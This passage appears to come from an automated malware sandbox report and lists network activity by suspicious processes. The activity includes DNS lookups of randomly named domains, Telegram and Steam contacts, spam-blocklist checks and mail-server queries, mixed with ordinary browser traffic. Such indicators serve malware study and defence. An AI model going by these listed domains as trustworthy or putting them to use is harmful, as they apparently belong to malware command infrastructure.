                                                                                              importenptoc.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              importenptoc.com

                                                                                            • 8.8.8.8:53
                                                                                              voicesharped.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              voicesharped.com

                                                                                            • 8.8.8.8:53
                                                                                              inputrreparnt.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              63 B
                                                                                               136 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              inputrreparnt.com

                                                                                            • 8.8.8.8:53
                                                                                              torpdidebar.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              61 B
                                                                                               134 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              torpdidebar.com

                                                                                            • 8.8.8.8:53
                                                                                              actiothreaz.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              61 B
                                                                                               134 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              actiothreaz.com

                                                                                            • 8.8.8.8:53
                                                                                              garulouscuto.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              garulouscuto.com

                                                                                            • 8.8.8.8:53
                                                                                              breedertremnd.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              63 B
                                                                                               136 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              breedertremnd.com

                                                                                            • 8.8.8.8:53
                                                                                              steamcommunity.com
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              64 B
                                                                                               80 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              steamcommunity.com

                                                                                              DNS Response

                                                                                              104.82.234.109

                                                                                            • 8.8.8.8:53
                                                                                              bloodyeleftor.world
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              65 B
                                                                                               97 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              bloodyeleftor.world

                                                                                              DNS Response

                                                                                              104.21.63.231
                                                                                              172.67.172.150

                                                                                            • 8.8.8.8:53
                                                                                              vanaheim.cn
                                                                                              dns
                                                                                              powershell.exe
                                                                                              57 B
                                                                                               73 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              vanaheim.cn

                                                                                              DNS Response

                                                                                              2.59.161.190

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.dnsbl.sorbs.net
                                                                                              dns
                                                                                              powershell.exe
                                                                                              76 B
                                                                                               126 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.dnsbl.sorbs.net

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.bl.spamcop.net
                                                                                              dns
                                                                                              powershell.exe
                                                                                              75 B
                                                                                               128 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.bl.spamcop.net

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.zen.spamhaus.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              77 B
                                                                                               141 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.zen.spamhaus.org

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.sbl-xbl.spamhaus.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              81 B
                                                                                               145 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.sbl-xbl.spamhaus.org

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.cbl.abuseat.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              76 B
                                                                                               149 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.cbl.abuseat.org

                                                                                            • 8.8.8.8:53
                                                                                              impactsupport.world
                                                                                              dns
                                                                                              6ccbdd7074.exe
                                                                                              65 B
                                                                                               133 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              impactsupport.world

                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              4.0kB
                                                                                               7.4kB
                                                                                               12
                                                                                              14
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              3.5kB
                                                                                               7.1kB
                                                                                               10
                                                                                              11
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              2.8kB
                                                                                               7.6kB
                                                                                               8
                                                                                              12
                                                                                            • 8.8.8.8:53
                                                                                              yahoo.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              55 B
                                                                                               134 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              yahoo.com

                                                                                            • 8.8.8.8:53
                                                                                              mta6.am0.yahoodns.net
                                                                                              dns
                                                                                              powershell.exe
                                                                                              67 B
                                                                                               195 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              mta6.am0.yahoodns.net

                                                                                              DNS Response

                                                                                              67.195.204.73
                                                                                              67.195.228.110
                                                                                              67.195.204.74
                                                                                              98.136.96.91
                                                                                              67.195.228.94
                                                                                              67.195.204.79
                                                                                              67.195.228.106
                                                                                              98.136.96.77

                                                                                            • 8.8.8.8:53
                                                                                              youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              57 B
                                                                                               73 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube.com

                                                                                              DNS Response

                                                                                              142.250.179.238

                                                                                            • 8.8.8.8:53
                                                                                              spocs.getpocket.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               131 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              spocs.getpocket.com

                                                                                              DNS Response

                                                                                              34.117.188.166

                                                                                            • 8.8.8.8:53
                                                                                              youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              57 B
                                                                                               73 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube.com

                                                                                              DNS Response

                                                                                              142.250.179.238

                                                                                            • 8.8.8.8:53
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              82 B
                                                                                               98 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.ads.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              34.117.188.166

                                                                                            • 8.8.8.8:53
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              103 B
                                                                                               119 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              34.160.144.191

                                                                                            • 8.8.8.8:53
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              103 B
                                                                                               131 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:92a9::

                                                                                            • 8.8.8.8:53
                                                                                              youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              57 B
                                                                                               85 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:81d::200e

                                                                                            • 8.8.8.8:53
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              82 B
                                                                                               175 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.ads.prod.webservices.mozgcp.net

                                                                                            • 8.8.8.8:53
                                                                                              shavar.prod.mozaws.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              68 B
                                                                                               116 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              shavar.prod.mozaws.net

                                                                                              DNS Response

                                                                                              34.209.7.244
                                                                                              52.24.11.115
                                                                                              34.208.172.229

                                                                                            • 8.8.8.8:53
                                                                                              shavar.prod.mozaws.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              68 B
                                                                                               153 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              shavar.prod.mozaws.net

                                                                                            • 8.8.8.8:53
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              94 B
                                                                                               110 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.remote-settings.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              34.149.100.209

                                                                                            • 8.8.8.8:53
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              94 B
                                                                                               122 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.remote-settings.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:c47c::

                                                                                            • 142.250.179.238:443
                                                                                              youtube.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              1.8kB
                                                                                               9.3kB
                                                                                               6
                                                                                              10
                                                                                            • 8.8.8.8:53
                                                                                              www.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              61 B
                                                                                               319 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.youtube.com

                                                                                              DNS Response

                                                                                              216.58.213.14
                                                                                              216.58.212.238
                                                                                              142.250.187.238
                                                                                              216.58.201.110
                                                                                              172.217.169.46
                                                                                              142.250.200.46
                                                                                              216.58.204.78
                                                                                              142.250.179.238
                                                                                              142.250.200.14
                                                                                              142.250.180.14
                                                                                              172.217.169.14
                                                                                              142.250.178.14
                                                                                              172.217.16.238
                                                                                              142.250.187.206

                                                                                            • 8.8.8.8:53
                                                                                              youtube-ui.l.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                               293 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube-ui.l.google.com

                                                                                              DNS Response

                                                                                              216.58.201.110
                                                                                              216.58.213.14
                                                                                              142.250.187.206
                                                                                              172.217.16.238
                                                                                              142.250.178.14
                                                                                              172.217.169.14
                                                                                              216.58.204.78
                                                                                              142.250.179.238
                                                                                              142.250.200.46
                                                                                              142.250.187.238
                                                                                              216.58.212.238
                                                                                              172.217.169.46
                                                                                              142.250.200.14
                                                                                              142.250.180.14

                                                                                            • 8.8.8.8:53
                                                                                              youtube-ui.l.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                               181 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube-ui.l.google.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:81e::200e
                                                                                              2a00:1450:4009:820::200e
                                                                                              2a00:1450:4009:81f::200e
                                                                                              2a00:1450:4009:81d::200e

                                                                                            • 216.58.213.14:443
                                                                                              youtube-ui.l.google.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.3kB
                                                                                               9.4kB
                                                                                               11
                                                                                              11
                                                                                            • 8.8.8.8:53
                                                                                              consent.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               81 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              consent.youtube.com

                                                                                              DNS Response

                                                                                              216.58.201.110

                                                                                            • 8.8.8.8:53
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              79 B
                                                                                               160 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              firefox-api-proxy.cdn.mozilla.net

                                                                                              DNS Response

                                                                                              34.149.97.1

                                                                                            • 34.149.97.1:443
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.2kB
                                                                                               13.2kB
                                                                                               8
                                                                                              14
                                                                                            • 8.8.8.8:53
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              100 B
                                                                                               116 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                                                                              DNS Response

                                                                                              34.149.97.1

                                                                                            • 8.8.8.8:53
                                                                                              consent.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               81 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              consent.youtube.com

                                                                                              DNS Response

                                                                                              216.58.201.110

                                                                                            • 8.8.8.8:53
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              100 B
                                                                                               128 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:74e4::

                                                                                            • 8.8.8.8:53
                                                                                              consent.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               93 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              consent.youtube.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:826::200e

                                                                                            • 216.58.201.110:443
                                                                                              consent.youtube.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.6kB
                                                                                               10.3kB
                                                                                               9
                                                                                              13
                                                                                            • 8.8.8.8:53
                                                                                              www.google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              60 B
                                                                                               76 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.google.com

                                                                                              DNS Response

                                                                                              142.250.200.4

                                                                                            • 8.8.8.8:53
                                                                                              www.google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              60 B
                                                                                               88 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.google.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:822::2004

                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              1.9kB
                                                                                               9.3kB
                                                                                               7
                                                                                              10
                                                                                            • 8.8.8.8:53
                                                                                              github.com
                                                                                              dns
                                                                                              futors.exe
                                                                                              56 B
                                                                                               72 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              github.com

                                                                                              DNS Response

                                                                                              20.26.156.215

                                                                                            • 8.8.8.8:53
                                                                                              i.instagram.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              61 B
                                                                                               106 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              i.instagram.com

                                                                                              DNS Response

                                                                                              163.70.151.63

                                                                                            • 8.8.8.8:53
                                                                                              objects.githubusercontent.com
                                                                                              dns
                                                                                              futors.exe
                                                                                              75 B
                                                                                               139 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              objects.githubusercontent.com

                                                                                              DNS Response

                                                                                              185.199.108.133
                                                                                              185.199.110.133
                                                                                              185.199.111.133
                                                                                              185.199.109.133

                                                                                            • 8.8.8.8:53
                                                                                              nw-umwatson.events.data.microsoft.com
                                                                                              dns
                                                                                              msedge.exe
                                                                                              83 B
                                                                                               211 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              nw-umwatson.events.data.microsoft.com

                                                                                              DNS Response

                                                                                              20.42.73.29

                                                                                            • 8.8.8.8:53
                                                                                              api.telegram.org
                                                                                              dns
                                                                                              trano1221.exe
                                                                                              62 B
                                                                                               78 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              api.telegram.org

                                                                                              DNS Response

                                                                                              149.154.167.220

                                                                                            • 8.8.8.8:53
                                                                                              elviscomputer.hu
                                                                                              dns
                                                                                              powershell.exe
                                                                                              62 B
                                                                                               78 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              elviscomputer.hu

                                                                                              DNS Response

                                                                                              195.228.152.90

                                                                                            • 8.8.8.8:53
                                                                                              i.instagram.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              61 B
                                                                                               106 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              i.instagram.com

                                                                                              DNS Response

                                                                                              163.70.151.63

                                                                                            • 8.8.8.8:53
                                                                                              breakfasutwy.cyou
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              63 B
                                                                                               128 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              breakfasutwy.cyou

                                                                                            • 8.8.8.8:53
                                                                                              importenptoc.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              importenptoc.com

                                                                                            • 8.8.8.8:53
                                                                                              voicesharped.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              voicesharped.com

                                                                                            • 8.8.8.8:53
                                                                                              inputrreparnt.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              63 B
                                                                                               136 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              inputrreparnt.com

                                                                                            • 8.8.8.8:53
                                                                                              torpdidebar.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              61 B
                                                                                               134 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              torpdidebar.com

                                                                                            • 8.8.8.8:53
                                                                                              rebeldettern.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              rebeldettern.com

                                                                                            • 8.8.8.8:53
                                                                                              actiothreaz.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              61 B
                                                                                               134 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              actiothreaz.com

                                                                                            • 8.8.8.8:53
                                                                                              garulouscuto.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              garulouscuto.com

                                                                                            • 8.8.8.8:53
                                                                                              breedertremnd.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              63 B
                                                                                               136 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              breedertremnd.com

                                                                                            • 8.8.8.8:53
                                                                                              steamcommunity.com
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              64 B
                                                                                               80 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              steamcommunity.com

                                                                                              DNS Response

                                                                                              104.82.234.109

                                                                                            • 8.8.8.8:53
                                                                                              nestlecompany.pro
                                                                                              dns
                                                                                              con12312211221.exe
                                                                                              63 B
                                                                                               145 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              nestlecompany.pro

                                                                                            • 8.8.8.8:53
                                                                                              shiningrstars.help
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              64 B
                                                                                               129 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              shiningrstars.help

                                                                                            • 8.8.8.8:53
                                                                                              mercharena.biz
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              60 B
                                                                                               122 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              mercharena.biz

                                                                                            • 8.8.8.8:53
                                                                                              t.me
                                                                                              dns
                                                                                              powershell.exe
                                                                                              50 B
                                                                                               66 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              t.me

                                                                                              DNS Response

                                                                                              149.154.167.99

                                                                                            • 8.8.8.8:53
                                                                                              generalmills.pro
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              62 B
                                                                                               144 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              generalmills.pro

                                                                                            • 8.8.8.8:53
                                                                                              google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              56 B
                                                                                               77 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              google.com

                                                                                            • 8.8.8.8:53
                                                                                              smtp.google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              61 B
                                                                                               125 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              smtp.google.com

                                                                                              DNS Response

                                                                                              142.250.27.27
                                                                                              142.250.102.26
                                                                                              142.250.27.26
                                                                                              142.250.102.27

                                                                                            • 8.8.8.8:53
                                                                                              naturewsounds.help
                                                                                              dns
                                                                                              monthdragon.exe
                                                                                              64 B
                                                                                               129 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              naturewsounds.help

                                                                                            • 8.8.8.8:53
                                                                                              location.services.mozilla.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              75 B
                                                                                               153 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              location.services.mozilla.com

                                                                                              DNS Response

                                                                                              35.190.72.216

                                                                                            • 8.8.8.8:53
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              82 B
                                                                                               98 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.balrog.prod.cloudops.mozgcp.net

                                                                                              DNS Response

                                                                                              35.244.181.201

                                                                                            • 8.8.8.8:53
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              94 B
                                                                                               110 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.classify-client.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              35.190.72.216

                                                                                            • 35.190.72.216:443
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.5kB
                                                                                               5.0kB
                                                                                               14
                                                                                              12
                                                                                            • 8.8.8.8:53
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              82 B
                                                                                               110 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.balrog.prod.cloudops.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:5133::

                                                                                            • 8.8.8.8:53
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              94 B
                                                                                               187 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.classify-client.prod.webservices.mozgcp.net

                                                                                            • 8.8.8.8:53
                                                                                              play.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              61 B
                                                                                               77 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              play.google.com

                                                                                              DNS Response

                                                                                              142.250.178.14

                                                                                            • 8.8.8.8:53
                                                                                              fxreshideas.tech
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              62 B
                                                                                               127 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              fxreshideas.tech

                                                                                            • 8.8.8.8:53
                                                                                              play.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              61 B
                                                                                               89 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              play.google.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:815::200e

                                                                                            • 8.8.8.8:53
                                                                                              redirector.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               81 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              redirector.gvt1.com

                                                                                              DNS Response

                                                                                              142.250.187.206

                                                                                            • 8.8.8.8:53
                                                                                              ciscobinary.openh264.org
                                                                                              dns
                                                                                              firefox.exe
                                                                                              70 B
                                                                                               286 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              ciscobinary.openh264.org

                                                                                              DNS Response

                                                                                              2.18.121.79
                                                                                              2.18.121.72

                                                                                            • 8.8.8.8:53
                                                                                              shiningrstars.help
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              64 B
                                                                                               129 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              shiningrstars.help

                                                                                            • 8.8.8.8:53
                                                                                              redirector.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               81 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              redirector.gvt1.com

                                                                                              DNS Response

                                                                                              142.250.187.206

                                                                                            • 8.8.8.8:53
                                                                                              a19.dscg10.akamai.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              67 B
                                                                                               99 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              a19.dscg10.akamai.net

                                                                                              DNS Response

                                                                                              2.18.121.72
                                                                                              2.18.121.79

                                                                                            • 8.8.8.8:53
                                                                                              mercharena.biz
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              60 B
                                                                                               122 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              mercharena.biz

                                                                                            • 8.8.8.8:53
                                                                                              redirector.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                               93 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              redirector.gvt1.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:81f::200e

                                                                                            • 8.8.8.8:53
                                                                                              generalmills.pro
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              62 B
                                                                                               144 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              generalmills.pro

                                                                                            • 8.8.8.8:53
                                                                                              a19.dscg10.akamai.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              67 B
                                                                                               123 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              a19.dscg10.akamai.net

                                                                                              DNS Response

                                                                                              2a02:26f0:1700:f::1737:a1b9
                                                                                              2a02:26f0:1700:f::1737:a1d3

                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.0kB
                                                                                               9.3kB
                                                                                               9
                                                                                              10
                                                                                            • 142.250.187.206:443
                                                                                              redirector.gvt1.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.1kB
                                                                                               9.4kB
                                                                                               10
                                                                                              11
                                                                                            • 8.8.8.8:53
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              71 B
                                                                                               116 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              r2---sn-aigl6ns6.gvt1.com

                                                                                              DNS Response

                                                                                              74.125.105.7

                                                                                            • 8.8.8.8:53
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                               85 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              r2.sn-aigl6ns6.gvt1.com

                                                                                              DNS Response

                                                                                              74.125.105.7

                                                                                            • 8.8.8.8:53
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                               97 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              r2.sn-aigl6ns6.gvt1.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:4::7

                                                                                            • 74.125.105.7:443
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              1.8kB
                                                                                               5.9kB
                                                                                               6
                                                                                              7
                                                                                            • 8.8.8.8:53
                                                                                              telegram.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              116 B
                                                                                               74 B
                                                                                               2
                                                                                              1

                                                                                              DNS Request

                                                                                              telegram.org

                                                                                              DNS Request

                                                                                              telegram.org

                                                                                              DNS Response

                                                                                              149.154.167.99

                                                                                            • 8.8.8.8:53
                                                                                              blastikcn.com
                                                                                              dns
                                                                                              fher.exe
                                                                                              59 B
                                                                                               91 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              blastikcn.com

                                                                                              DNS Response

                                                                                              172.67.192.178
                                                                                              104.21.60.59

                                                                                            • 8.8.8.8:53
                                                                                              byaronia.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              58 B
                                                                                               74 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              byaronia.com

                                                                                              DNS Response

                                                                                              109.232.216.168

                                                                                            • 8.8.8.8:53
                                                                                              mail.ru
                                                                                              dns
                                                                                              powershell.exe
                                                                                              53 B
                                                                                               73 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              mail.ru

                                                                                            • 8.8.8.8:53
                                                                                              mxs.mail.ru
                                                                                              dns
                                                                                              powershell.exe
                                                                                              57 B
                                                                                               89 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              mxs.mail.ru

                                                                                              DNS Response

                                                                                              94.100.180.31
                                                                                              217.69.139.150

                                                                                            • 8.8.8.8:53
                                                                                              edcatiofireeu.shop
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              64 B
                                                                                               121 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              edcatiofireeu.shop

                                                                                            • 8.8.8.8:53
                                                                                              impolitewearr.biz
